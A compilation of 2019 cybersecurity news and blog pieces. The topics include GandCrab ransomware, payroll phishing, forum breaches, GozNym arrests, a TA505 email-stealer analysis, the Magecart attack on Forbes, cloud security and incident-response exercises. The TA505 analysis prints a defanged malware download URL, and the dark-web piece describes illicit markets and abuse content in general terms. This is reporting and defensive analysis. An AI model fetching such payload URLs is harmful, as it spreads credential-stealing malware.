“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”
The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.
The GandCrab sample that targeted the honeypot was downloaded more than 500 times. Unfortunately, the sample was not the only one, counted together, experts estimated that there have been nearly 800 downloads in the five days, as well as more than 2300 downloads of the other GandCrab sample in the open directory.
“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.
“Counted together, there has been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.
The researchers pointed out that this isn’t a massive or widespread attack, anyway it represents a serious risk to MySQL server admins that exposed their installs online.
Getting your paycheck deposited directly into your bank account seems like a handy solution but in some cases. hackers can access them.
Getting your paycheck deposited directly into your bank account seems
like a handy solution because you don’t have to pick up the check from your
workplace and take it to the bank to deposit it. It works well in many cases
but is not immune to hackers.
Hackers Do a Payroll Diversion Through
A direct deposit paycheck hack involves getting the necessary details
from the victim through a phishing scheme. According to a statement about from
the FBI’s Internet Crime Complaint Center (IC3), cybercriminals orchestrate the
phishing attempt — which the FBI calls a “payroll diversion” — to get
the details for a person’s online payroll account.
Once successful, the hacker changes the account details for the direct
deposit payments to an account they control. The FBI notes that the hacker’s
account often connects to a prepaid credit card instead of a traditional bank
account. Moreover, the cybercriminal applies a rule so that the rightful direct
deposit recipient does not get a notification about the account change.
An Increasingly Attempted Hack
This method hackers use likely won’t come as a surprise when you
consider a few recent statistics about phishing. When PhishLabs published findings from its
most recent report, it revealed that phishing attacks in 2018 went up
by 40.9%. Plus, in 83.9% of cases, hackers aimed to get user credentials for
various services, including payment-related ones.
And, the PhishLabs report showed 98% of the phishing emails that made
it past enterprise-level email security controls did not contain malware. A different
phishing study from Barracuda explained why hackers don’t need malware to cause
damage. Instead, they use social engineering to pose as a person or company
that the victim knows and responds to without question.
Those efforts fall into the business email compromise (BEC) category.
Barracuda’s study examined 3,000
such attacks. It found that 60% percent did not contain links.
But, they often had personalized information such as the victim’s name or a
question related to the person’s work.
Even worse, hackers tweaked the email addresses to make them appear as
being from legitimate people in the company. Typically, the hackers set up
accounts with free email services and create accounts containing a real
employee’s name. That’s enough genuine information for the recipients to act
without looking at the rest of the email address too closely.
Trustwave covered BEC
payroll hacks in a blog post and mentioned that cybercriminals
often make the phishing emails seem to originate from a company’s CEO and go to
a human resources or accounting manager, or someone else with the ability to
alter an employee’s direct deposit account information. The hackers also
perform research to determine which parties have the authority to make such
changes before sending the emails.
Payroll Companies and Employers Can Commit
Most of the content here focuses on cybercriminals going through the
process to steal direct deposit details. But, that’s not the only kind of
payroll fraud that could happen. Unfortunately, some payroll companies that
enterprises work with have bad actors in them that figure out various ways to
keep workers from their money. Or, the employers themselves give false
information about the number of employees on the payroll.
One incident committed by a payroll company in Australia resulted in
the equivalent of a $122.5 million
USD tax fraud. That incident is a strong reminder that whether
companies have employees only in the U.S. or working elsewhere in the world,
it’s crucial to do business with a trustworthy vendor who knows the global
business realm. Choosing a United States-headquartered company is also smart
due to the security and protection that U.S. jurisdiction offers.
How to Stay Safe From Payroll Diversion Fraud
Statistics from 2016 indicate 82% of Americans receive their
paychecks via direct deposit. So, it’s not surprising that hackers try this
paycheck diversion tactic. Knowing the information here, what can you do to
stay safe and increase the chances of having access to your money as expected?
Firstly, if you are in a position of authority and get a request from
someone asking for a direct deposit account change, don’t respond to the email
in an act of blind trust. If possible, contact that person through another
method, such as by phone or approaching them in person to verify that they
truly sent the message. Do the same if someone from payroll emails you asking
for your direct deposit details to “update their records.”
Another thing you can do is check the structure of the email. As
mentioned earlier, the emails used for this kind of BEC trick normally have at
least one component that’s not quite right. For example, it may have a person’s
name but come from a free email service instead of the company domain.
It’s also ideal at a company level if employees get educated about how
to recognize this kind of fraud and get information about the steps they should
go through if they receive suspicious emails of any kind. For example, they
could forward any strange emails about payroll details or otherwise to the IT
department for further review.
Think Before You Act
Getting paid on time is a top concern for most people. But, even if you get an email that insists you need to provide the requested details to avoid payment delays, it’s best to investigate further before responding.
Since April 2019, Group-IB has successfully blocked more than 43,000 links to pirated copies of the Game of Thrones Season 8 on pirate websites, forums, and social media
As the Game
of Thrones saga came to a close (no spoilers here), Group-IB has summed up the
results of its anti-piracy campaign during Season 8 of the Game of Thrones –
one of the biggest franchises in the TV history. Since April 2019, when the
final season premiered, Group-IB Anti-Piracy team has successfully blocked more
than 43,000 links to pirated copies of the GOT Season 8 on pirate websites,
forums, and social media. Group-IB’s Anti-Piracy team was brought in to protect
Game of Thrones against online pirates back in 2015. Since that time, the
company’s specialists have blocked more than 180,000 links to illegal copies of
Game of Thrones in Russian.
final GOT Season 8 premiered on 14 April and became one of the show’s most
popular seasons not only among fans all over the world, but also among online
pirates. Group-IB’s Anti-Piracy team discovered and blocked 43,711 links to
pirated Season 8 episodes in Russian. Illegal copies surfaced on pirate
websites, forums, and social media. Pirated copies of the GOT Season 8 episodes
were spotted on 1,098 different websites, 94 of which were designed exclusively
for the distribution of pirated GOT copies.
than 30,000 unique links to pirated GOT episodes have been removed from the
search results of the Russian search engine Yandex. In response to the
blocking, online pirates struck back by creating mirrors on a daily basis – copies
of their websites with new but very similar domain names. For instance, one of
the pirates created more than 20 mirrors on their subdomains. However, according
to the pirates’ forum posts, the owners of pirate websites were not ready for
the “attack” on them: “Looks like somebody just wiped the links out. Some of
the pages disappeared… some of them do not appear in search results”. It is
also interesting that some of the groups on VK.com, a Russian social network, removed
pirated episodes after receiving complaints and turned into GOT fan pages.
streaming service Amediateka holds exclusive distribution rights for the Game
of Thrones in Russia and since April 2015, when Season 5 premiered, has used
the services of Group-IB to fight online pirates distributing illegal copies of
the GOT in Russian. Season after season, online pirates’ interest in the show
has only been increasing. For example, while Season 5 was broadcast, Group-IB’s
Anti-Piracy team detected and removed 2,067 links to illegal copies. Season 7
saw an increase, reaching 12,540 links to pirated episodes detected and blocked.
Season 8 set a record of 43,711 links. For the past 4 years, Group-IB detected
and blocked more than 180,000 links, including links detected and blocked
between the seasons’ airings.
not the only Amediateka’s show that Group-IB’s Anti-Piracy team protects, but
it turned out to be pirates’ favorite one. Pirates’ other top targets include
True Detective, with 23,473 pirated links detected and blocked, Billions (20,303
links), The Good Wife (14,541 links), and Westworld, with 12,229 links detected and blocked by Group-IB
the battle against online pirates, trying to profit off the illegal distribution
of the Game of Thrones in Russian, was as fierce as for George R.R. Martin’s
characters,” commented Andrey Busargin, Director
of Anti-Piracy and Brand Protection at Group-IB. “I would also like to
highlight Amediateka’s commitment to counter online piracy in Russia: they brought
in Group-IB Anti-Piracy team ahead of time and have been making continuous
efforts to popularize legal viewership of the Game of Thrones making it
available on its website, in movie theaters all over the country and even on
fight against digital piracy started in 2011, when the Anti-Piracy Department was
established. Group-IB’s Anti-Piracy team uses unique machine-learning
technologies applied in complex investigations of cyberattacks to detect pirate
websites, find their owners and block illegal content. Group-IB’s Anti-Piracy
system monitors 100,000+ resources in all languages ranging from torrent
trackers and streaming services to social media groups and pirate platforms in
the DarkNet. The average time to detect the first pirated copy on the Internet
is 30 minutes. 80% of pirated links are successfully blocked by Group-IB team within
24 hours of their appearance on the Internet.
This is really interesting- a popular online forum that hackers have been using to trade stolen credentials has been hacked!
Reports confirm that OGusers, a popular online form used by hackers to trade stolen account credentials, has been hacked and that this had caused sensitive personal data of many users to be exposed.
Brian Krebs writes, in his website KrebsOnSecurity, “Ogusers[.]com — a forum popular among people involved in hijacking online accounts and conducting SIM swapping attacks to seize control over victims’ phone numbers — has itself been hacked, exposing the email addresses, hashed passwords, IP addresses and private messages for nearly 113,000 forum users.”
It all started with an administrator of OGusers explaining to forum members, on May 12, that an outage had caused a hard drive failure, leading to the erasure of private messages, forum posts and prestige points that’s worth several months. He also stated that he had restored a backup from January 2019. But then, the OGusers administrators didn’t realize that what had happened, coinciding with the outage, was the theft of users’ database from the forum and the wiping of forum hard drives as well. Four days later, on May 16, the administrator of rival hacking community RaidForums uploaded the entire OGusers database for anyone to download for free.
The KrebsOnSecurity report quotes the message that RaidForums administrator Omnipotent has posted. It reads, “On the 12th of May 2019 the forum ogusers.com was breached [and] 112,988 users were affected. I have uploaded the data from this database breach along with their website source files. Their hashing algorithm was the default salted MD5 which surprised me, anyway the website owner has acknowledged data corruption but not a breach so I guess I’m the first to tell you the truth. According to his statement he didn’t have any recent backups so I guess I will provide one on this thread lmfao.”
Brian Krebs further says, “The database, a copy of which was obtained by KrebsOnSecurity, appears to hold the usernames, email addresses, hashed passwords, private messages and IP address at the time of registration for approximately 113,000 users (although many of these nicknames are likely the same people using different aliases).”
Experts point out that although the passwords that were exposed are hashed, the fact that the encryption method used was MD5, an older and easily hackable form of encryption, puts all passwords at risk of exposure.
Since OGusers is already known as a forum that attracts people who hijack phone numbers to take over victims’ social media, financial accounts, email etc and sell such access for thousands of dollars, the exposure has caused shock among many in the community. Anxious members responded promptly and, as per Brian Krebs, some of them even complained of being targeted by phishing emails. It’s also reported that some members even expressed anger at the main administrator of OGusers. The members even seemed to claim that the main administrator, who uses the nickname ‘Ace’, altered the functionality of the forum following the hack so as to prevent users from removing their accounts.
On the other hand, reports say that an OGusers administrator commented, after the hack was disclosed, that though members’ frustration is understandable, it’s to be noted that even Twitter, Facebook and other Forums that people have used have been breached more than once.
Brian Krebs concludes his report with a very relevant remark. He says, “It’s difficult not to admit feeling a bit of schadenfreude in response to this event. It’s gratifying to see such a comeuppance for a community that has largely specialized in hacking others. Also, federal and state law enforcement investigators going after SIM swappers are likely to have a field day with this database, and my guess is this leak will fuel even more arrests and charges for those involved.”
In December 2017, the Canadian man Jordan Evan Bloom (27) was charged with data leak of 3 billion hacked accounts, the man was running a website to collect personal data and login credentials from the victims.
The man was charged as part of an investigation dubbed “Project Adoration,” aiming at trafficking in personal data, unauthorized use of computers, and possession of an illicitly obtained property.
The RCMP alleges that Bloom was the administrators of the LeakedSource.com website that operated through his company Defiant Tech.
LeakedSource offered for sale access to data gathered data from the victims of security breaches, sometimes buying it from hackers.
For $2 a day, a subscriber at LeakedSource, had the possibility to obtain the details on individuals by entering his email address or username. LeakedSource was also cracking the associated passwords when it was possible. The website was very popular among the users of the HackForums.net.
“A guilty plea was entered in court today by Defiant Tech Inc., to the charges of Trafficking In Identity Information and Possession of Property Obtained By Crime a year and a half after charges were laid into the RCMP’s cybercrime investigation dubbed Project “Adoration”. ” reads the press release published by RCMP.
“LeakedSource.com had a database of approximately three billion personal identity records and associated passwords that could be purchased for a small fee. Defiant Tech Inc. was operating the LeakedSource.com website and the company earned approximately $247,000 from trafficking identity information. “
The arrest of Bloom is the result of a joint effort of Canadian authorities, FBI and Dutch National Police.
According to the Royal Canadian Mounted Police, Defiant Tech made around CAN$247,000 (US$183,000) from his illegal activities.
“We are pleased with this latest development,” said Superintendent Mike Maclean, Officer in Charge Criminal Operations of the RCMP National Division. “I am immensely proud of this outcome as combatting cybercrime is an operational priority for us.”
According to the experts, Bloom didn’t operate the website alone, at least another US citizen was involved, but none was charged for this.
Which is the difference between the Deep Web and Dark Web? Considerations about past, present, and future of the Dark Web.
These are intense days for the Dark Web. Operations conducted by law enforcement agencies lad to the arrests of many individuals and the closure of the most popular Black Marketplaces, many of which remained alive over the years.
Operators behind the principal black markets made a lot of money, let’s think of managers of the Wall Street Market and Valhalla recently seized by feds. These are historic points of aggregations where it was possible to buy drugs, weapons, and any kind of hacking tools.
The icing on the cake was a US research that decreed how the size of the Dark Web was significantly lower than previously thought. This isn’t a novelty for the experts that are studying dark web and its evolution.
Unfortunately there is too much confusion between the term deep web and dark web, many videos on YouTube channels provide wrong information. Misinterpretation, superficiality, some times simple profits, these are the root cause of the confusion. This misinformation is extremely dangerous for kids, first consumers of videos published on the principal social media platform. Some videos show that is very simple to buy drugs securely or explain how to hack a website. Describing these phenomena, some journalists have been labeled “as experts on the dark web”.
The Dark Web is just a portion of the Deep Web, its access is quite simple and doesn’t require any specific technological skill. It is very easy to access to the Tor network or browse content on other anonymizing networks like I2P.
I started this research on September 2016, when I started writing my my book, “The Prison of the Humanity – from the deep web to 4.0 the new digital prisons”.
An Iceberg has always been used as a visual representation of the Internet world. The visible peak, which represents the smallest part of the iceberg, that many have mistakenly associated with the clear web: is the part reachable by search engines.
Even a child could easily wonder: how can
billions of sites visible to internet users represent 5% of the internet
The Deep Web is composed of the content of the www that is not indexed by search engines. Try to imagine the site of a Provider that offers voice or connectivity services to millions of people, families and companies. Its files are not indexable by search engines. Try to think of a banking site with millions of account holders who keep the history of transactions, deposits, investments for years and years, without obviously being accessible to the entire web population.
Let’s also include all information by the IOT devices that are connected online by that that cannot be accessed for obvious reasons.
Well, not you can have an idea about the dimension of the deep web.
THE DARK WEB
What is the Dark Web? It is a non-indexed subset of the Deep Web. Accessible through TOR and other software, it has a size that is incalculable if we use imagination. In fact, there could be many .onion sites, an extension of the domains inside the TOR network, which are not indicated by the Hidden Wiki, a sort of Wikipedia of onion Links. Furthermore, each website can have sublevels that could reach infinity.
But here we
talk about legends. We go into the merits of my research which is based on the
facts and experience of three years of journalistic navigation in the Dark Web
where not only do you have browsed dozens of Directories, but you have visited
at least 100,000 sites.
My search is based on 100,000 sites that I have personally visited and that can be easily classified into very few categories that I will explain to you with brief descriptions:
The spirit of the Dark Web includes precisely the freedom of expression with portals that give “uncomfortable” or “alternative” news in countries where there is censorship. There are many sites in multiple languages that refer to ideological and collective movements, due to the greater number of Anarchist derivations, but there are also movements that promote the defense of online privacy. So there is so much counter-information and the most obvious example that I always carry forward is the version of the Bible translated into the languages of the countries where it is strictly prohibited.
They are the heart of the Dark Web in economic terms, needless to say that it is impossible to count them verify their reliability, but they are certainly the points of aggregation for several million users and unscrupulous sellers that offer drugs, weapons, medicines requiring medical prescription, bank credential and personal data of unsuspecting users, steroids and hacking guides.
Empty pages, typical errors displaying code 404 that feed the list of the .onion domains in the directories.
There are many sites that promise the same services as Black Markets, including hitman services, hacking services, money laundering services… but they are only services operated by scammers.
Directories – Search Engines
There are many directories that offer the same links, Hidden Wiki services that offer a guide to the principal links in the Dark Web, but it is clear that the hidden Wiki is one and the original not only reports the links to the sites but also provides an “obscure and forbidden” encyclopedia service similar to the best known Wikipedia. The presence of search engines that are similar to Google are also frequent, but they do not always find the result that they hope for.
pornography-pornography-violence on animals-GORE
There are many pornographic sites on the clear web, but pornography in the dark web takes on gruesome tones. Violence, child abuse, snuff movies and extreme sex are very common. The sites that belong to these categories are divided into different types: chat rooms, traditional websites or service containers. The chats are usually open and there is a remarkable exchange of multimedia files for free. Then there are the forums that need registration, they offer audio/video content or images, and also provide suggestions on how to kill people or how to eat them in ritual cannibalism. Furthermore, there are many child pornography sites on the dark web that point to the largest online sharing platforms, such as Satoshi box or Megaupload, where it is possible to pay to download packages of illegal content.
Websites – Forums
They are normal websites that deal with different topics, including forums that represent meeting points for users that discuss legal and non-legal issues. There are many blogs that for the greater part deal with issues of cybersecurity and the rights of the digital population in terms of consumer protection and privacy.
Consider sites belonging to the above categories, in many cases they are traps set up by the law enforcement agencies to attempt to identify criminals. The dark web is full of honeypots.
Let’s conclude with some statistic on the composition of the Dark Web:
Not Working: 45%
Websites – Forums: 6%
Child pornography – Gore: 4%
Directories – search engines: 0.5%
Black Markets: 0.2%
At this time, it is not possible to determine the exact number of Black Markets, anyway, it is really limited. Terrorism is an irrelevant phenomenon in terms of propaganda. It is also impossible to determine the diffusion of honeypots.
The real question is not how big is the Dark Web, but what will happen after the operations conducted law enforcement?
Who will be its users? Will Black Markets still exist?
Or is the Dark Web itself a honeypot for criminals, anarchists, terrorists and. pedophiles?
These doubts are legitimate, given that the military origins of the most popular anonymizing network.
A joint effort by international law enforcement agencies from 6 different countries has dismantled the crime gang behind the GozNym banking malware.
GozNym banking malware is considered one of the most dangerous threats to the banking industry, experts estimated it allowed to steal nearly $100 million from over 41,000 victims across the globe for years.
“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”
The GozNym banking malware was first spotted in April 2015 by researchers from the IBM X-Force Research, it combines the best features of Gozi ISFB and Nymaim malware.
The GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan there are 24 financial institutions in North America and organizations in Europe, including a Polish webmail service providers, investment banking and consumer accounts at 17 banks in Poland and one bank in Portugal.
Now the Europol announced the unprecedented, international law enforcement operation that allowed to dismantled the complex, globally operating and organised cybercrime network.
Europol with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States identified and 0 individuals alleged members of the GozNym network.
5 defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine, the remaining ones are Russians citizens and are still on the run, including the expert who developed the banking malware.
The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.
One of the members that encrypted GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.
Operators behind the GozNym malware used the Avalanche network to spread the malware.
“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network. The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network. The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.“
The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.
“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:
infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.“
The defendants are well known on Russian underground, they advertised their specialized technical skills and services in Russian-speaking online criminal forums. Through these forums the leader of the GozNym network recruited them.
“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues the Europol.
Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group
During the last month, our Threat Intelligence surveillance team spotted increasing evidence of an operation intensification against the Banking sector. In fact, many independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focusing on Retail and Banking companies. The group is also known for some evasive techniques they put in place over time to avoid the security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legit programs regularly used by victim, or also the abuse of valid cryptographically signed payloads.
Investigating and tracking their operations during April and May we detected an interesting tool was delivered through the victim machine. Just after the opening of malicious documents and the installation of FlawedAmmy RAT implants, the group used to deploy a particular credential stealing software, part of their arsenal, revealing details of their recent operation.
The piece of malware under analysis were downloaded from “bullettruth[.com/out[.exe”, it was executed into the victim machines after the establishment of the infection.
Firstly, we noticed this secondary component was well protected against antivirus detection, in fact, the PE file was signed by Sectigo in the first half of May, one of the major Russian Certification Authority. Analyzing the trust chain we found the attackers were relying on cryptographic keys released to a UK company named SLON LTD. At this time, we have no evidence to hypothesize it could be a victim of previous hacks or not.
Anyway, a static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.
Dynamically executing the malware, more information about its behaviour is revealed. The malicious executable is substantially an email stealer, in fact, the only purpose is to retrieve all the emails and passwords accounts present inside the victim machine. After executing the information gathering routine, the malware sends to its C2 all the retrieved emails and passwords:
The interesting thing about the communication with the C2 is the fact that there is no encryption: the data harvested are sent to the C2 in JSON format. Investigating the attacker infrastructure we noticed interesting information such as the information of the stolen emails through our Digital Surveillance systems.
In order to retrieve more details about this Email Stealer, the analysis has moved into debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware execute itself within a debugger, we were able to extract the unpacked payload of the malware.
As shown by the above figure, we notice a peculiarity of these two components: while the packed sample is compiled in Microsoft Visual C++ version 6.0, the unpacked one is compiled in Microsoft Visual C++ version 8. At this point, we deepen the analysis on the extracted payload. However, we are not able to execute it, because it always references many memory addresses of the original one. So, we carry on static analysis on the extracted sample.
As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts.. The first step is to check whether the “outlook.exe” process is running and, in this case it kills the process.The malware iterate through user processes with Process32FirstW API and then kill it with TerminateProcess:
The extracted payload does not present any type of code obfuscation of other types. In fact the C2 server and the path is not encoded:
The last routine being analyzed is the credential harvesting inside the entire filesystem.
Apart from the routine that searches for the email account registered in Outlook and Thunderbird clients (as shown in Figure 7), there is another one which scans the filesystem looking for hardcoded extensions, then, if one of them is found, a reference to the found file is conserved inside the %TEMP% directory. At this point, all the gathered email accounts are sent to the server and then erasing all traces of itself from the infected machine, in fact, the malware creates a simple batch script which delete itself and all the tracks of infection.
Analysis of Exposed Emails
In this paragraph are shown some statistics about the harvested emails in the attack campaign, recovered during surveillance and hunting operations. So we decided to create a graph in which sort the most frequent TLD occurrences of all the stolen data.
As seen in the graph above, the most frequent TLD is .com with 193.194 occurrences, following .kr with 102.025 occurrences, .cn with 26.160 occurrences, it with 6.317 occurrences and so on. To better visualize the macro-locations involved in this exposure we built a heatmap showing the geographical distribution of the TOP 100 countries referenced in the TLDs.
The heatmap shows the less-affected countries with a greenish color, on the contrary, the most-affected ones tend to an orange or red-tinged color. The first thing that emerges from these 2 distributions is that this specific threat seems not to be targeted, in fact, the diffusion is almost global with some red or orange zones in UK, Italy, Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded the thousand occurrences.
Nowadays, the email accounts are an effective source of revenue for the cyber criminals. In fact all these information can be used to spread other malware through phishing campaigns, to perform BEC attacks (Business Email Compromise) and also to try credential stuffing attacks.
Evan a simple Info-Stealer malware like this one could be a dangerous threat, especially if used by organized groups in conjunction with other malware implants. In fact, as reported by the independent researcher Germán Fernández Bacian too, this Email Stealer has been recently used by the infamous TA505 hacking group. This link means, with good confidence, the exposed data, full email accounts in some cases and email contacts in general, are now available to a cyber-criminal group who launched targeted attacks against Banks and Retail industries in the near past.
Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.
The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.
The Magecart group is back, the hackers this time compromised injected a skimmers script into the Forbes magazine subscription website.
The malicious traffic was spotted by the security expert Troy Mursch, Chief Research Officer of Bad Packets, on Wednesday.
The expert immediately attempted to report his discovery to Forbes via email, but without success.
The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.
A Forbes spokesperson told El Reg that is investigating the incident and that at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activities.
Forbes was likely a victim of a supply chain attack, Magecart hackers have compromised a company that provides services to the media outlet.
During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.
Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.
“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published RiskIQ.
Thousands of other companies that are customers at Picreel are at risk, potentially affected domains are listed here.
Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data, but they are quite different from each other.
According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.
Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.
Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy.
Tech Connect Live 2019: Dublin, 30 May
BH Consulting COO Valerie Lyons will be presenting at this event which takes place at the RDS in Dublin on Thursday 30 May. The conference is a business and technology event, with talks on a range of related subjects happening throughout the day. The event is free to attend, and more than 5,000 delegates are expected on the day. To find out more and to register for a free pass, visit here.
Data Protection Officer certification course: Vilnius/Maastricht June/July
BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here.
IAM Annual Conference: Dublin, 28-30 August
Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page.
I was a panellist at the e-Crime & Cybersecurity Congress last week, the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond", a recap of the points I made.
Cloud is the 'Default Model' for Business
Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes successful business continually craves. Indeed, the 'scales of economy' benefits are not just most cost-effective and more agile IT services, but also include better cybersecurity (by the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business' cloud service mitigation, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given they ultimately own the cybersecurity risk, which is an operational business risk.
There are security pitfalls with cloud services, the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure, as after all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.
Cloud Security should not be an afterthought It is essential for security to be baked into a new cloud services design, requirements determination, and in the procurement process. In particular, defining and documenting the areas of security responsibility with the intended cloud service provider.
Cloud does not absolve the business of their security responsibilities All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
Cloud Service Provider Owned
Shared (Cloud Service Provider & Business)
For example with a PaaS model, the business is fully responsible for application deployment onto the cloud platform, and therefore the security of applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. The example of the 'shared' responsibility with this model, are the processes in providing and managing privileged operating system accounts within the cloud environment.
Regardless of the cloud model, data is always the responsibility of the business.
A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where those security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or in a supporting agreement as service deliverables, then oversight the controls and processes through regular assessments.
The cloud security guidance resources I recommended were:
If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.
These exercises are
designed to be immersive. They might start with a scenario like a board
meeting, or a company orientation day. All participants will get a role to play;
for the purpose of the session, they might be designated as a head of HR,
finance, legal, or IT. As the scenario starts to unfold, a message arrives. The
press has been enquiring about a major data breach or a ransomware attack on
Muscles tighten, a wave of
nausea passes over the stomach. The fight-or-flight instinct starts to take
hold. Your role might say manager, but you don’t feel like you’re in control.
What happens next?
That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.
The exercise should prompt
plenty of questions for the participants. What exactly is going on? How do we
find out what’s happened? How is this affecting operations? Who’s taking charge?
What do we tell staff, or the public, or the media?
A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).
Other organisations may
already have a series of steps for what to do in the event of an incident or
breach. In these cases, the table-top exercise is about testing the viability
of those plans. You can be prepared, but do the steps on paper work in
practice? Or as Mike Tyson memorably put it, “everybody has a plan until they
get punched in the mouth”.
The exercise can show the
value of having a playbook that documents all procedures to carry out: “if X
happens, then do Y”. This will also shed light on missing steps, such as
contact numbers for key company executives, an external security consultant,
regulators, law enforcement, or media.
Fail to prepare, prepare to fail
When it comes to
developing or refining an incident response plan, the devil is in the detail,
says David Prendergast, senior cybersecurity consultant at BH Consulting. Here
are some useful questions to ask:
If your policy
says: ‘contact the regulator’, ask which one(s)
Who is the
specific point of contact at the regulators office?
organisation have the email address or phone numbers for that person?
Who in your
company or agency is authorised to talk to the regulator?
are they likely to need to have that conversation?
Do you have
pre-prepared scripts or statements for when things might go wrong (for
customers, stakeholders, staff, and media (including social media channels)?
It might also force the
company into making certain decisions about resources. Are there enough internal
staff to carry out an investigation? Is that the most appropriate use for those
employees, or is it better to focus their efforts on recovering IT systems?
That’s the value in
table-top exercises: they afford the time to practice when it’s calm and you
can absorb the lessons. There are plenty of examples of companies that handled
similar situations spectacularly badly in full public view. (We won’t name
names, but the list includes anyone who uttered the words “sophisticated attack”
before an investigation even started.)
By the (play)book
It’s more helpful to learn
from positive examples of companies that showed leadership in the face of a
serious incident. That can be as simple as a statement of business priorities
while an organisation copes with the fallout. In 2017, as Maersk reeled from a
ransomware infection, CEO Soren Skou gave frontline staff in 130 countries
clear instructions. As the Financial Times reported,
the message was unequivocal even as the company was forced into shutting down
IT systems. “Do what you think is right to serve the customer – don’t
wait for the HQ, we’ll accept the cost.”
Some larger companies will
run an exercise just for themselves, but some organisations run joint
war-gaming scenarios with industry peers. Earlier this month, financial
institutions and trade associations from around Europe carried out a simulated
